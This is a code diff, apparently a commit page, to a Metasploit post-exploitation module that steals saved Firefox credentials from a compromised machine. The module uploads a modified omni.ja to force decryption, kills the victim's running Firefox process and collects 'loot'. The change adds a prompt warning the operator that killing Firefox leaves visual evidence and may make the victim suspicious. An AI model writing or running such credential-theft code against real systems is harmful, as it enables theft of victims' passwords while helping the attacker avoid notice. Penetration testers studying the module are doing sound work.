|
16 | 16 |
|
17 | 17 | class Metasploit3 < Msf::Post |
18 | 18 |
|
| 19 | + include Rex::Ui::Interactive |
19 | 20 | include Msf::Post::File |
20 | 21 | include Msf::Post::Common |
21 | 22 | include Msf::Auxiliary::Report |
@@ -75,11 +76,6 @@ def run |
75 | 76 | end |
76 | 77 |
|
77 | 78 | if datastore['DECRYPT'] |
78 | | - print_line() |
79 | | - print_warning("Please be aware of that if your session dies while file renaming,") |
80 | | - print_warning("this could leave Firefox in a non working state. This option needs") |
81 | | - print_warning("some extra time to accomplish the task.\n") |
82 | | - |
83 | 79 | omnija = nil |
84 | 80 | org_file = 'omni.ja' |
85 | 81 | new_file = Rex::Text::rand_text_alpha(5 + rand(3)) + ".ja" |
@@ -116,6 +112,7 @@ def run |
116 | 112 | return |
117 | 113 | end |
118 | 114 | print_status("Uploading #{new_file} to #{@paths['ff']}") |
| 115 | + print_warning("This takes some extra time") if @platform =~ /unix|osx/ |
119 | 116 | if not upload_file(@paths['ff']+new_file, tmp) |
120 | 117 | print_error("Could not upload #{new_file}") |
121 | 118 | return |
@@ -477,22 +474,34 @@ def trigger_decrypt(org_file, new_file) |
477 | 474 | if session.type == "meterpreter" |
478 | 475 | session.sys.process.each_process do |p| |
479 | 476 | if p['name'] =~ /firefox\.exe/ |
480 | | - print_status("Found running Firefox process, attempting to kill.") |
481 | | - if not session.sys.process.kill(p['pid']) |
482 | | - print_error("Could not kill Firefox process") |
483 | | - return false |
| 477 | + print_status("Found running Firefox process") |
| 478 | + continue = warn_user() |
| 479 | + if continue |
| 480 | + if not session.sys.process.kill(p['pid']) |
| 481 | + print_error("Could not kill Firefox process") |
| 482 | + return false |
| 483 | + end |
| 484 | + else |
| 485 | + file_rm(new_file) |
| 486 | + return false |
484 | 487 | end |
485 | 488 | end |
486 | 489 | end |
487 | 490 |
|
488 | 491 | elsif session.type != "meterpreter" |
489 | 492 | p = cmd_exec("ps", "cax | grep firefox") |
490 | 493 | if p =~ /firefox/ |
491 | | - print_status("Found running Firefox process, attempting to kill.") |
492 | | - term = cmd_exec("killall", "firefox && echo true") |
493 | | - if not term =~ /true/ |
494 | | - print_error("Could not kill Firefox process") |
495 | | - return false |
| 494 | + print_status("Found running Firefox process") |
| 495 | + continue = warn_user() |
| 496 | + if continue |
| 497 | + term = cmd_exec("killall", "firefox && echo true") |
| 498 | + if not term =~ /true/ |
| 499 | + print_error("Could not kill Firefox process") |
| 500 | + return false |
| 501 | + end |
| 502 | + else |
| 503 | + file_rm(new_file) |
| 504 | + return false |
496 | 505 | end |
497 | 506 | end |
498 | 507 | end |
@@ -526,6 +535,13 @@ def trigger_decrypt(org_file, new_file) |
526 | 535 |
|
527 | 536 | end |
528 | 537 |
|
| 538 | + def warn_user() |
| 539 | + print_warning("In order to proceed, the running Firefox process must be killed.") |
| 540 | + print_warning("Keep in mind that this leaves visual evidence on the victim machine and") |
| 541 | + print_warning("if the user is paying attention, this could make him/her suspicious.") |
| 542 | + return prompt_yesno("Do you want to continue?") |
| 543 | + end |
| 544 | + |
529 | 545 | def download_loot(paths) |
530 | 546 | loot = "" |
531 | 547 | paths.each do |path| |
|
0 commit comments